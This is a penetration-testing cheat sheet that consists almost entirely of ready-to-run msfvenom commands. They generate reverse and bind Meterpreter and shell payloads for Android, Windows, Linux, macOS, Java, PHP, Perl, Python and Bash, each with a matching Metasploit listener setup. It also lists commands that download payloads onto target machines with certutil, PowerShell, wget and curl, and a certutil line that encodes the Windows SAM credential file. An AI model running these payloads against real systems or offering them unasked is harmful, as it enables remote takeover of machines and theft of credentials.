~/Tools Tips & Tricks/Msfvenom#

#IP: 192.168.1.50

#PORT: 5050

Base64

cat FILE | base64 -w0
echo 'BASE64' | base64 -d > FILE

Base64 Alternative

base64 -w 0 $FILE_NAME | xclip -selection clipboard

* Linux
base64 data.txt > data.b64
base64 -d data.b64 > data.txt

* Windows
certutil -encode SAM sam.b64 && findstr /v /c:- tmp.b64 > data.b64
certutil -decode data.b64 data.txt

* macOS
base64 -i data.txt -o data.b64
base64 -D -i data.b64 -o data.txt

File Transfer Windows

powershell iwr http://192.168.1.50/ipayload.exe -outfile c:\ProgramData\ipayload.exe
certutil.exe -urlcache -split -f http://192.168.1.50/ipayload.exe

File Transfer Linux

wget http://192.168.1.50/ipayload
curl -O http://192.168.1.50/ipayload
fetch http://192.168.1.50/ipayload # on BSD

Nc Transfer

nc -nvlp 6666 > ipayload # Remote
nc TargetIP 6666 < ipayload # Local

Scp Transfer

# Copy a file:
scp /root/Payloads/ipayload username@IP
# Copy a directory:
scp -r /root/Payloads username@IP

Server

python -m SimpleHTTPServer 5050
python3 -m http.server 5050

Android Reverse TCP

msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=5050 \
  > 'android_meterpreter_reverse_tcp_5050.apk'
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Android Reverse HTTP

msfvenom -p android/meterpreter_reverse_http \
  LHOST=192.168.1.50 LPORT=5050 \
  > '/android_meterpreter_reverse_http_5050.apk'
use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Android Reverse HTTPS

msfvenom -p android/meterpreter/reverse_https \
  LHOST=192.168.1.50 LPORT=5050 \
  > 'android_meterpreter_reverse_https_5050.apk'
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASP TCP

msfvenom -p windows/meterpreter/reverse_tcp -f asp \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_asp_tcp_5050.asp'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASP HTTP

msfvenom -p windows/meterpreter/reverse_http -f asp \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_asp_http_5050.asp'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASP HTTPS

msfvenom -p windows/meterpreter/reverse_https -f asp \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_asp_https_5050.asp'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASP BIND

msfvenom -p windows/meterpreter/bind_tcp -f asp \
  --platform windows -a x86 -e generic/none  LPORT=5050 \
  > 'windows_meterpreter_asp_bind_5050.asp'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASPX TCP

msfvenom -p windows/meterpreter/reverse_tcp -f aspx \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_aspx_tcp_5050.aspx'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASPX HTTP

msfvenom -p windows/meterpreter/reverse_http -f aspx \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_aspx_http_5050.aspx'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASPX HTTPS

msfvenom -p windows/meterpreter/reverse_https -f aspx \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_aspx_https_5050.aspx'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows ASPX BIND

msfvenom -p windows/meterpreter/bind_tcp -f aspx \
  --platform windows -a x86 -e generic/none  LPORT=5050 \
  > 'windows_meterpreter_aspx_bind_5050.aspx'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Bash TCP

msfvenom -p cmd/unix/reverse_bash -f raw \
  --platform unix -e generic/none -a cmd LHOST=192.168.1.50 LPORT=5050 \
  > 'bash_meterpreter_tcp_5050.sh'
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Bash HTTP

msfvenom -p cmd/unix/reverse_bash -f raw \
  --platform unix -e generic/none -a cmd LHOST=192.168.1.50 LPORT=5050 \
  > 'bash_meterpreter_http_5050.sh'
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Bash HTTPS

msfvenom -p cmd/unix/reverse_bash -f raw \
  --platform unix -e generic/none -a cmd LHOST=192.168.1.50 LPORT=5050 \
  > 'bash_meterpreter_https_5050.sh'
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

JSP Java TCP

msfvenom -p java/meterpreter/reverse_tcp -f raw \
  --platform java -e generic/none -a java LHOST=192.168.1.50 LPORT=5050 \
  > 'java_meterpreter_tcp_5050.jsp'
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

JSP Java HTTP

msfvenom -p java/meterpreter/reverse_http -f raw \
  --platform java -e generic/none -a java LHOST=192.168.1.50 LPORT=5050 \
  > 'java_meterpreter_http_5050.jsp'
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

JSP Java HTTPS

msfvenom -p java/meterpreter/reverse_https -f raw \
  --platform java -e generic/none -a java LHOST=192.168.1.50 LPORT=5050 \
  > 'java_meterpreter_https_5050.jsp'
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

JSP Java BIND

msfvenom -p java/meterpreter/bind_tcp -f raw \
  --platform java -e generic/none -a java  LPORT=5050 \
  > 'java_meterpreter_bind_5050.jsp'
use exploit/multi/handler
set PAYLOAD java/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Linux TCP

msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf \
  --platform linux -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'linux_meterpreter_tcp_5050.elf'
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Linux HTTP

msfvenom -p linux/x86/meterpreter_reverse_http -f elf \
  --platform linux -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'linux_meterpreter_http_5050.elf'
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter_reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Linux HTTPS

msfvenom -p linux/x86/meterpreter_reverse_https -f elf \
  --platform linux -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'linux_meterpreter_https_5050.elf'
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter_reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Linux BIND

msfvenom -p linux/x86/meterpreter/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=5050 \
  > 'linux_meterpreter_bind_5050.elf'
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Perl Reverse TCP

msfvenom -p cmd/unix/reverse_perl -f pl \
  --platform unix -a cmd -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'linux_meterpreter_perl_tcp_5050.pl'
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Perl Reverse BIND

msfvenom -p cmd/unix/bind_perl -f pl \
  --platform unix -a cmd -e generic/none  LPORT=5050 \
  > 'linux_meterpreter_perl_bind_5050'
use exploit/multi/handler
set PAYLOAD cmd/unix/bind_perl
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PHP Reverse TCP

msfvenom -p php/meterpreter/reverse_tcp -f raw \
  --platform php -e generic/none -a php LHOST=192.168.1.50 LPORT=5050 \
  > 'php_meterpreter_tcp_5050.php'
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PHP Reverse BIND

msfvenom -p php/meterpreter/bind_tcp -f raw \
  --platform php -e generic/none -a php  LPORT=5050 \
  > 'php_meterpreter_bind_5050.php'
use exploit/multi/handler
set PAYLOAD php/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PowerShell Reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp -f ps1 \
  --platform windows -e generic/none -a x86 LHOST=192.168.1.50 LPORT=5050 \
  > 'powershell_meterpreter_tcp_5050.ps1'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PowerShell Reverse HTTP

msfvenom -p windows/meterpreter/reverse_http -f ps1 \
  --platform windows -e generic/none -a x86 LHOST=192.168.1.50 LPORT=5050 \
  > 'powershell_meterpreter_http_5050.ps1'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PowerShell Reverse HTTPS

msfvenom -p windows/meterpreter/reverse_https -f ps1 \
  --platform windows -e generic/none -a x86 LHOST=192.168.1.50 LPORT=5050 \
  > 'powershell_meterpreter_https_5050.ps1'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PowerShell Reverse BIND

msfvenom -p windows/meterpreter/bind_tcp -f ps1 \
  --platform windows -e generic/none -a x86  LPORT=5050 \
  > 'powershell_meterpreter_bind1_5050.ps1.ps1'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

PowerShell Reverse BIND

msfvenom -p windows/meterpreter_bind_tcp -f ps1 \
  --platform windows -e generic/none -a x86  LPORT=5050 \
  > 'powershell_meterpreter_bind2_5050.ps1'
use exploit/multi/handler
set PAYLOAD windows/meterpreter_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Python Reverse TCP

msfvenom -p python/meterpreter/reverse_tcp -f raw \
  --platform python -e generic/none -a python LHOST=192.168.1.50 LPORT=5050 \
  > 'python_meterpreter_tcp_5050.py'
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Python Reverse HTTP

msfvenom -p python/meterpreter/reverse_http -f raw \
  --platform python -e generic/none -a python LHOST=192.168.1.50 LPORT=5050 \
  > 'python_meterpreter_http_5050.py'
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Python Reverse HTTPS

msfvenom -p python/meterpreter/reverse_https -f raw \
  --platform python -e generic/none -a python LHOST=192.168.1.50 LPORT=5050 \
  > 'python_meterpreter_https_5050.py'
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Python Reverse BIND

msfvenom -p python/meterpreter/bind_tcp -f raw \
  --platform python -e generic/none -a python  LPORT=5050 \
  > 'python_meterpreter_bind1_5050.py'
use exploit/multi/handler
set PAYLOAD python/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Python Reverse BIND

msfvenom -p python/meterpreter_bind_tcp -f raw \
  --platform python -e generic/none -a python  LPORT=5050 \
  > 'python_meterpreter_bind2_5050.py'
use exploit/multi/handler
set PAYLOAD python/meterpreter_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Tomcat JAVA TCP

msfvenom -p java/meterpreter/reverse_tcp -f raw \
  --platform java -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'tomcat_meterpreter_tcp_5050.war'
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Tomcat JAVA HTTP

msfvenom -p java/meterpreter/reverse_http -f raw \
  --platform java -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'tomcat_meterpreter_http_5050.war'
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Tomcat JAVA HTTPS

msfvenom -p java/meterpreter/reverse_https -f raw \
  --platform java -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'tomcat_meterpreter_https_5050.war'
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Tomcat JAVA BIND

msfvenom -p java/meterpreter/bind_tcp -f raw \
  --platform java -a x86 -e generic/none  LPORT=5050 \
  > 'tomcat_meterpreter_bind_5050.war'
use exploit/multi/handler
set PAYLOAD java/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows Reverse TCP

msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_tcp_5050.exe'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows Reverse HTTP

msfvenom -p windows/meterpreter/reverse_http -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_http_5050.exe'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows Reverse HTTPS

msfvenom -p windows/meterpreter/reverse_https -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
  > 'windows_meterpreter_https_5050.exe'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows Reverse BIND

msfvenom -p windows/meterpreter/bind_tcp -f exe \
  --platform windows -a x86 -e generic/none  LPORT=5050 \
  > 'windows_meterpreter_bind1_5050.exe'
use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Windows Reverse BIND

msfvenom -p windows/meterpreter_bind_tcp -f exe \
  --platform windows -a x86 -e generic/none  LPORT=5050 \
  > 'windows_meterpreter_bind2_5050.exe'
use exploit/multi/handler
set PAYLOAD windows/meterpreter_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Mac Reverse Shell TCP

msfvenom -p osx/x86/shell_reverse_tcp -f macho \
  RHOST=192.168.1.50  LPORT=5050 \
  > 'mac_reverse_tcp_5050.macho'
use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j

Mac Reverse Shell BIND

msfvenom -p osx/x86/shell_bind_tcp -f macho \
  RHOST=192.168.1.50  LPORT=5050 \
  > 'mac_reverse_bind_5050.macho'
use exploit/multi/handler
set PAYLOAD osx/x86/shell_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j